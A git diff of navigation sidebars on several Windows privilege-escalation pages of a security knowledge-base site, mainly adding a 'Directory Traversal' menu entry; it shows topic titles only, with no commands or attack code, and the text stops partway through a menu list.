- - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html b/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html index 3453c4a9..6dcc5e99 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Scheduled Tasks.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -185,22 +185,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html b/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html index c3bf3af6..e9c68a2a 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Startup Applications.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -182,22 +182,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html b/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html index 44fbc990..5052d879 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Stored Credentials.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
